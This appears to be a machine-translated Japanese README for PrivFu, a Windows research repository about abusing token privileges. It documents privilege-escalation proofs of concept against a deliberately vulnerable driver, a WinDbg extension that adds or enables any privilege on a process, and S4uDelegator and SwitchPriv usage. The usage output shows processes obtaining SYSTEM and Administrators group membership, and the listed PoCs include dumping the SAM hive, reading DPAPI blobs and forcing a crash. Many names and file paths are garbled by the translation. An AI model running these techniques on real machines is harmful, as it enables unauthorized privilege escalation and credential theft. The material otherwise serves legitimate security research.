PrivFu
1.0.0
カーネルモードWindBG拡張機能とPOCSトークン特権の仕組みをテストするためのPOCS。
Grzegorz Tworekのpriv2adminなどのトークン特権乱用に関する注目すべきリポジトリと記事があります。このリポジトリのコードは、トークンの特権の仕組みの調査に役立つことを目的としています。
トップに戻ります
プロジェクト
このプロジェクトでは、高度レベルのシェルからシステム特権を取得する方法をカバーしています。詳細については、readme.mdを参照してください。
トップに戻ります
プロジェクト
このプロジェクトの目的は、攻撃者がarbitrary意的なカーネルをどのように乱用しているかを調査することです。すべてのPOCは、Hacksys Extreme脆弱なドライバー向けに書かれています。これらのPOCのほとんどは、任意のカーネルの書き込み脆弱性とトークン特権を乱用することにより、システムの整合性レベルを取得するために機能します。 Windows 10バージョン1809/1903でテストされていますが、Windows 10のほとんどが理論的に動作するはずです。
| POC名 | 説明 |
|---|---|
| createassigntokenvariant | このPOCは、 SeCreateTokenPrivilegeとSeAssignPrimaryTokenPrivilegeでEOPを実行します。 |
| CreateImpersonAteTokenVariant | このPOCは、 SeCreateTokenPrivilegeとSeImpersonatePrivilegeでEOPを実行します。 |
| CreateTokenVariant | このPOCは、 SeCreateTokenPrivilegeでEOPを実行します。 |
| debuginjectionvariant | このPOCは、 SeDebugPrivilegeでEOPを実行します。最終段階でwinlogon.exeにコードインジェクションを使用します。 |
| debugupdateprocvariant | このPOCは、 SeDebugPrivilegeでEOPを実行します。最終段階でUpdateProcThreadAttribute APIを使用して、winlogon.exeからシステムプロセスを作成します。 |
| restoreservicemodificationVariant | このPOCは、 SeRestorePrivilegeでEOPを実行します。このPOCでhijackshelllibを使用してください。 |
| SecondaryLogonvariant | このPOCは、 SeCreateTokenPrivilegeとSeImpersonatePrivilegeでEOPを実行します。最終段階でセカンダリログオンサービスを使用します。 |
| Take OwnshipServiceModificationVariant | このPOCは、 SeTakeOwnershipPrivilegeでEOPを実行します。このPOCでhijackshelllibを使用してください。 |
| TCBS4UASSIGNTOKENVARIANT | このPOCは、 SeTcbPrivilegeでEOPを実行します。中程度の必須レベルからシステムの必須レベルシェルを取得します。 |
| TCBS4UIMPRENATIONVARIANT | このPOCは、 SeTcbPrivilegeでEOPを実行します。 S4Uログオンでスレッドのなりすましを実行します。高くなったり、システムの整合性レベルを取得したりしません。 |
トップに戻ります
プロジェクト
警告
一部の環境では、デバッグビルドは機能しません。リリースビルドが推奨されます。
Priveditorは、特定のプロセスのトークン特権を操作するためのカーネルモードWindBG拡張です。この拡張機能により、調査したいトークン特権を簡単に構成できます。
0: kd> .load C:devPrivEditorx64ReleasePrivEditor.dll
PrivEditor - Kernel Mode WinDbg extension for token privilege edit.
Commands :
+ !getps : List processes in target system.
+ !getpriv : List privileges of a process.
+ !addpriv : Add privilege(s) to a process.
+ !rmpriv : Remove privilege(s) from a process.
+ !enablepriv : Enable privilege(s) of a process.
+ !disablepriv : Disable privilege(s) of a process.
+ !enableall : Enable all privileges available to a process.
+ !disableall : Disable all privileges available to a process.
[*] To see command help, execute "!<Command> help" or "!<Command> /?".
このコマンドは、ターゲットシステムにプロセスをリストすることです。
0: kd> !getps /?
!getps - List processes in target system.
Usage : !getps [Process Name]
Process Name : (OPTIONAL) Specifies filter string for process name.
引数なしでこのコマンドを実行する場合、このコマンドは次のようにターゲットシステム内のすべてのプロセスをリストします。
0: kd> !getps
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
0 0xfffff805`81233630 0x00000000`00000000 Idle
4 0xffffd60f`ec068380 0xffffaf00`cec07a40 System
68 0xffffd60f`f1780480 0xffffaf00`d3b290a0 svchost.exe
88 0xffffd60f`ec0db080 0xffffaf00`cec0d080 Registry
324 0xffffd60f`ef342040 0xffffaf00`d0416080 smss.exe
348 0xffffd60f`f052f100 0xffffaf00`d25d30a0 dwm.exe
408 0xffffd60f`eca8e140 0xffffaf00`d21bd930 csrss.exe
480 0xffffd60f`f05a8340 0xffffaf00`d2568670 svchost.exe
484 0xffffd60f`efcd60c0 0xffffaf00`d06430e0 wininit.exe
500 0xffffd60f`efd130c0 0xffffaf00`d23100a0 csrss.exe
580 0xffffd60f`efdc0080 0xffffaf00`d2266630 winlogon.exe
--snip--
特定のプロセスを知りたい場合は、次のように文字列フィルターを設定します。フィルターは、フォワードマッチングとケースの鈍感で動作します。
0: kd> !getps micro
PID nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
4568 0xffffd60f`f14ed080 0xffffaf00`d3db60a0 MicrosoftEdge.exe
4884 0xffffd60f`f1647080 0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
4892 0xffffd60f`f1685080 0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
このコマンドは、特定のプロセスのトークン特権をリストすることです。
0: kd> !getpriv /?
!getpriv - List privileges of a process.
Usage : !getpriv <PID>
PID : Specifies target process ID.
このコマンドを使用するには、次のようにターゲットプロセスIDを小数形式で設定する必要があります。
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
このコマンドは、特定のプロセスにトークン特権を追加することです。
0: kd> !addpriv /?
!addpriv - Add privilege(s) to a process.
Usage : !addpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
+ IncreaseQuota : SeIncreaseQuotaPrivilege.
+ MachineAccount : SeMachineAccountPrivilege.
+ Tcb : SeTcbPrivilege.
+ Security : SeSecurityPrivilege.
+ TakeOwnership : SeTakeOwnershipPrivilege.
+ LoadDriver : SeLoadDriverPrivilege.
+ SystemProfile : SeSystemProfilePrivilege.
+ Systemtime : SeSystemtimePrivilege.
+ ProfileSingleProcess : SeProfileSingleProcessPrivilege.
+ IncreaseBasePriority : SeIncreaseBasePriorityPrivilege.
+ CreatePagefile : SeCreatePagefilePrivilege.
+ CreatePermanent : SeCreatePermanentPrivilege.
+ Backup : SeBackupPrivilege.
+ Restore : SeRestorePrivilege.
+ Shutdown : SeShutdownPrivilege.
+ Debug : SeDebugPrivilege.
+ Audit : SeAuditPrivilege.
+ SystemEnvironment : SeSystemEnvironmentPrivilege.
+ ChangeNotify : SeChangeNotifyPrivilege.
+ RemoteShutdown : SeRemoteShutdownPrivilege.
+ Undock : SeUndockPrivilege.
+ SyncAgent : SeSyncAgentPrivilege.
+ EnableDelegation : SeEnableDelegationPrivilege.
+ ManageVolume : SeManageVolumePrivilege.
+ Impersonate : SeImpersonatePrivilege.
+ CreateGlobal : SeCreateGlobalPrivilege.
+ TrustedCredManAccess : SeTrustedCredManAccessPrivilege.
+ Relabel : SeRelabelPrivilege.
+ IncreaseWorkingSet : SeIncreaseWorkingSetPrivilege.
+ TimeZone : SeTimeZonePrivilege.
+ CreateSymbolicLink : SeCreateSymbolicLinkPrivilege.
+ DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
+ All : All privileges.
たとえば、Sedebugprivilegeを特定のプロセスに設定する場合は、最初の引数のターゲットプロセスIDを設定し、次のように2番目の引数のヘルプメッセージにリストされているようにdebugを短縮します。
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 5704
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
特権名の引数は、ケースの鈍感です。
一度にすべてのトークン特権を追加したい場合は、 all特権名の引数として設定します。
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.
0: kd> !getpriv 5704
Privilege Name State
========================================== ========
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeMachineAccountPrivilege Disabled
SeTcbPrivilege Disabled
SeSecurityPrivilege Disabled
--snip--
このコマンドは、特定のプロセスからトークン特権を削除することです。
0: kd> !rmpriv /?
!rmpriv - Remove privilege(s) from a process.
Usage : !rmpriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
sechangenotifyprivilegeを削除する場合は、次のようにこのコマンドを実行します。
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
!addprivコマンドとして、すべてのトークン特権を特権名のallとして設定することで、一度にすべてのトークン特権を削除できます。
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.
0: kd> !getpriv 352
Privilege Name State
========================================== ========
[*] PID : 352
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
このコマンドは、特定のプロセスのトークン特権を有効にすることです。
0: kd> !enablepriv /?
!enablepriv - Enable privilege(s) of a process.
Usage : !enablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
最初の引数はプロセスIDのもので、2番目はトークン特権名です。
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
まだ追加されていない特権を有効にしようとした場合、このコマンドはそれを自動的に追加します。
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
このコマンドは、特定のプロセスのトークン特権を無効にすることです。
0: kd> !disablepriv /?
!disablepriv - Disable privilege(s) of a process.
Usage : !disablepriv <PID> <Privilege>
PID : Specifies target process ID.
Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.
+ CreateToken : SeCreateTokenPrivilege.
+ AssignPrimaryToken : SeAssignPrimaryTokenPrivilege.
+ LockMemory : SeLockMemoryPrivilege.
--snip--
このコマンドを使用するには、最初の引数のターゲットプロセスIDを設定し、2番目の引数にはトークン特権名を設定します。
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.
0: kd> !getpriv 1932
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Enabled
[*] PID : 1932
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
このコマンドは、特定のプロセスで利用可能なすべてのトークン特権を有効にすることです。
0: kd> !enableall /?
!enableall - Enable all privileges available to a process.
Usage : !enableall <PID>
PID : Specifies target process ID.
次のように機能します:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
このコマンドは、特定のプロセスに対してすべてのトークン特権を無効にすることです。
0: kd> !disableall /?
!disableall - Disable all privileges available to a process.
Usage : !disableall <PID>
PID : Specifies target process ID.
このコマンドは!disablepriv <PID> allに相当します。次のように機能します:
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.
0: kd> !getpriv 3792
Privilege Name State
========================================== ========
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Disabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
[*] PID : 3792
[*] Process Name : cmd.exe
[*] nt!_EPROCESS : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
トップに戻ります
プロジェクト
このプロジェクトは、 SeDebugPrivilegeなどの繊細なトークン特権のPOCSです。現在、それらの一部のPOCSをリリースしました。
| プログラム名 | 説明 |
|---|---|
| Seauditprivilegepoc | このPOCは、 SeAuditPrivilegePoCによって新しいセキュリティイベントを作成しようとします。 SeAuditPrivilege高い完全性レベルを必要としませんが、このPOCは、新しいイベントソースをインストールするために最初の実行で管理特権を必要とします。さらに、結果を確認するために、このPOCはローカルセキュリティポリシーの設定を変更する必要がある場合があります。 |
| sebackupprivilegepoc | このPOCは、 SeBackupPrivilegeによってHKLMSAMを捨てようとします。 |
| ecreatepagefileprivilegepoc | このPOCは、PageFileオプションをSeCreatePagefilePrivilegeの値に設定しようとします。 |
| exeateTokenPrivileGepoc | このPOCは、 SeCreateTokenPrivilegeによって高架トークンを作成しようとします。 |
| Sedebugprivilegepoc | このPOCは、 SeDebugPrivilegeによってwinlogon.exeにハンドルを開こうとします。 |
| serestoreprivilegepoc | このPOCは、 SeRestorePrivilegeによるC:WindowsSystem32でテストファイルを作成しようとします。 |
| sesecurityprivilegepoc | このPOCは、 SeSecurityPrivilegeによる最新のセキュリティイベントを読み込もうとしています。 |
| seshutdownprivilegepoc | このPOCは、 SeShutdownPrivilegeによってBSODを引き起こそうとします。 |
| SESYSTEMENVIRONMENTPRIVILEGEPOC | このPOCは、 SeSystemEnvironmentPrivilegeによってシステム環境を列挙しようとします。 UEFIベースのシステムでのみ機能します。 OS機能により、このPOCはOSでは以前のWindows 10ビルド1809で機能しません。 |
| setakewanshipprivilegepoc | このPOCはHKLM:SYSTEMCurrentControlSetServicesdmwappushserviceの所有者をSeTakeOwnershipPrivilegeによって発信者ユーザーアカウントに変更しようとします。 |
| setcbprivilegepoc | このPOCは、 SeTcbPrivilegeによってBuiltinBackup OperatorsなるようにS4Uログオンを実行しようとします。 |
| setrustedcredmanaccessprivilegepoc | このPOCは、 SeTrustedCredManAccessPrivilegeによってDPAPI Blobにアクセスしようとします。 |
トップに戻ります
プロジェクト
このツールは、setcbprivilegeを使用してS4Uログオンを実行することです。このツールでS4Uログオンを実行するには、管理権が必要です。
PS C:Tools> .S4uDelegator.exe -h
S4uDelegator - Tool for S4U Logon.
Usage: S4uDelegator.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account SID.
-x, --execute : Flag to execute command.
-c, --command : Specifies command to execute. Default is cmd.exe.
-d, --domain : Specifies domain name to lookup or S4U logon.
-e, --extra : Specifies group SIDs you want to add for S4U logon with comma separation.
-n, --name : Specifies account name to lookup or S4U logon.
-s, --sid : Specifies SID to lookup.
このツールを使用するには、 -lまたは-xフラグを指定する必要があります。 -lフラグは、次のようにアカウント情報を検索するためのものです。
PS C:Tools> .S4uDelegator.exe -l -d contoso -n "domain admins"
[*] Account Name : CONTOSODomain Admins
[*] SID : S-1-5-21-3654360273-254804765-2004310818-512
[*] Account Type : Group
PS C:Tools> .S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Name : NT SERVICEWinDefend
[*] SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
S4Uログオンでコマンドを実行するには、 -xフラグを設定し、次のようにアカウント名またはSIDを指定します。実行するコマンドは-cオプションで指定できます(デフォルトはcmd.exeです):
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> .S4uDelegator.exe -x -d . -n admin
[*] S4U logon target information:
[*] Account : CL01admin
[*] SID : S-1-5-21-2659926013-4203293582-4033841475-500
[*] UPN : (Null)
[*] Type : User
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.
C:Tools>whoami /user
USER INFORMATION
----------------
User Name SID
========== =============================================
cl01admin S-1-5-21-2659926013-4203293582-4033841475-500
追加のグループ情報を追加する場合は、次のように-eオプションを使用してコンマ分離値でグループSIDを設定します。
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============= =============================================
contosodavid S-1-5-21-3654360273-254804765-2004310818-1104
PS C:Tools> .S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell
[*] S4U logon target information:
[*] Account : CONTOSOjeff
[*] SID : S-1-5-21-3654360273-254804765-2004310818-1105
[*] UPN : [email protected]
[*] Type : User
[>] Verifying extra group SID(s).
[*] BUILTINAdministrators (SID : S-1-5-32-544) will be added as a group.
[*] NT AUTHORITYNETWORK SERVICE (SID : S-1-5-20) will be added as a group.
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:Tools> whoami /user
USER INFORMATION
----------------
User Name SID
============ =============================================
contosojeff S-1-5-21-3654360273-254804765-2004310818-1105
PS C:Tools> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTINUsers Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYAuthenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYThis Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTINAdministrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group
NT AUTHORITYNETWORK SERVICE Well-known group S-1-5-20 Mandatory group, Enabled by default, Enabled group
CONTOSOServerAdmins Group S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group
Service asserted identity Well-known group S-1-18-2 Mandatory group, Enabled by default, Enabled group
Mandatory LabelSystem Mandatory Level Label S-1-16-16384
警告
ターゲットマシンのプリビレッドアカウントでS4Uログオンを試してみると、エラー
0xC0000142(STATUS_DLL_INIT_FAILED)が表示され、コマンドは実行できません。この問題を回避するには、特権グループを-eオプションの追加グループとして追加します。さらに、一部のアカウントは、S4Uログオンの追加グループ(
NT SERVICETrustedInstallerなど)として指定することはできません。そのようなグループアカウントを追加グループとして設定すると、S4Uログオンはエラー0x00000005(ERROR_ACCESS_DENIED)で失敗します
トップに戻ります
プロジェクト
このツールは、プロセスの特定のトークン特権を有効または無効にすることです。
PS C:Dev> .SwitchPriv.exe -h
SwitchPriv - Tool to control token privileges.
Usage: SwitchPriv.exe [Options]
-h, --help : Displays this help message.
-d, --disable : Specifies token privilege to disable or "all".
-e, --enable : Specifies token privilege to enable or "all".
-f, --filter : Specifies token privilege you want to remain.
-i, --integrity : Specifies integrity level to set in decimal value.
-p, --pid : Specifies the target PID. Default specifies PPID.
-r, --remove : Specifies token privilege to remove or "all".
-s, --search : Specifies token privilege to search.
-g, --get : Flag to get available privileges for the target process.
-l, --list : Flag to list values for --integrity options.
-S, --system : Flag to run as "NT AUTHORITYSYSTEM".
--integrityオプションの値をリストするには、次のように--listフラグを実行します。
PS C:Dev> .SwitchPriv.exe -l
Available values for --integrity option:
* 0 : UNTRUSTED_MANDATORY_LEVEL
* 1 : LOW_MANDATORY_LEVEL
* 2 : MEDIUM_MANDATORY_LEVEL
* 3 : MEDIUM_PLUS_MANDATORY_LEVEL
* 4 : HIGH_MANDATORY_LEVEL
* 5 : SYSTEM_MANDATORY_LEVEL
* 6 : PROTECTED_MANDATORY_LEVEL
* 7 : SECURE_MANDATORY_LEVEL
Example :
* Down a specific process' integrity level to Low.
PS C:> .SwitchPriv.exe -p 4142 -s 1
Protected and Secure level should not be available, but left for research purpose.
ターゲットプロセスのPIDは、 -pオプションで指定されています。次のように、 -gフラグと-pオプションを使用して、ターゲットプロセスの利用可能な特権をリストできます。
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
-pオプションが指定されていない場合、PIDはこのツールの親PIDになります。
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 6772
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
制御する特権名は、ターゲットプロセスで利用可能な特権で一意の特権名を指定できる、いずれかのケースでは慎重な文字列で仕様化されています。たとえば、ターゲットプロセスに対してSeUndockPrivilegeを有効にするには、次のように--enableオプションで実行します。
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -e und
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
一意の特権名を指定できない偽の文字列を設定すると、次のメッセージが表示されます。
PS C:Dev> .SwitchPriv.exe -p 9408 -e se
[>] Trying to enable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[-] Cannot specify a unique privilege to enable.
[*] SeShutdownPrivilege
[*] SeChangeNotifyPrivilege
[*] SeUndockPrivilege
[*] SeIncreaseWorkingSetPrivilege
[*] SeTimeZonePrivilege
[*] Done.
たとえば、sechangenotifyprivilegeを有効にするには、次のように--disableオプションで実行します。
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -d chan
[>] Trying to disable a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
特権を削除するには、次のように--removeオプションを使用します。
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= ==========================
SeShutdownPrivilege Disabled
